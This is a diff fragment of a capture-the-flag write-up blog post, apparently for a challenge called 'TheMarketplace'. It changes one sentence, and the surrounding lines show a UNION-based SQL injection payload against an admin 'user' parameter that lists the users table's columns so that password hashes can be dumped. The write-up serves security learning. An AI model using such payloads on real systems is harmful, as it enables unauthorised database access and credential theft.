cbev0x/cbev0x.github.io/_posts/2026-01-28-TheMarketplace.md

 ![](../assets/img/2026-01-28-TheMarketplace/9.png)

-Lastly, let's dump all columns in the users table to potentially grab any hashes from the DB.
+Now let's dump all columns in the users table to potentially grab any hashes from the DB.

 ```
 /admin?user=0 union select group_concat(column_name,'\n'),2,3,4 from information_schema. columns where table_name='users' -- -